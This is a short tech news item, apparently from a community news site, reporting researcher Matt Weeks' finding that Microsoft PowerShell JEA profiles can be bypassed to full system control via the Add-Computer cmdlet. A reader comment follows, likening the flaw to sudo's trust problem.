Microsoft's PowerShell feature "Just Enough Administration" (JEA) is, apparently, "way too much administration" according to researcher Matt Weeks.
In this write-up of JEA, root9B and Metasploit module developer Weeks says JEA profiles aren't much of a barrier, since people with JEA profiles can escalate themselves to sysadmin status. Cutting to the conclusion:
"Every JEA profile I had found Microsoft has published can be bypassed to obtain complete system administrative rights, most of them immediately, reliably, and without requiring any special configuration."
The idea with JEA is to provide granular administrative profile management – a good thing, if only it worked out that way.
By way of demonstration, Weeks provides a variety of examples in which capabilities in JEA are exploitable.
The Add-Computer "cmdlet", used to add a computer to a domain or change its domain, and which Weeks says is "a reliable vector to break the JEA security barrier, and escalate privileges to complete unrestricted system control".
His attack doesn't use any hacks-or-cracks stuff: it ends with the new computer pulling group policy from an attacker-controlled Domain Controller providing group policy settings.
Result? Success: the victim machine "will pull group policy settings from your new server, enabling you via a group policy configuration to change any setting, drop the firewall, execute any command as system via startup scripts or scheduled tasks, or directly log in as the domain admin. You have broken the 'security barrier' and have full unrestricted administrative control over the system."
(Score: 3, Informative) by frojack on Tuesday October 11 2016, @01:58AM
It means you have to understand that the JEA profile users ARE still effectively sysadmins/domain admins/etc with full permissions, and the JEA profile just keeps honest people honest.
Its no worse than the sudo -s hole in linux I guess.
You give someone sudo authority you sort of have to trust them to do some thing, and hope they don't want to do things they aren't supposed to do. A far better way is to have some scripts and give people only the ability to run those scripts, but invariably they will find a way around that as well.
No, you are mistaken. I've always had this sig.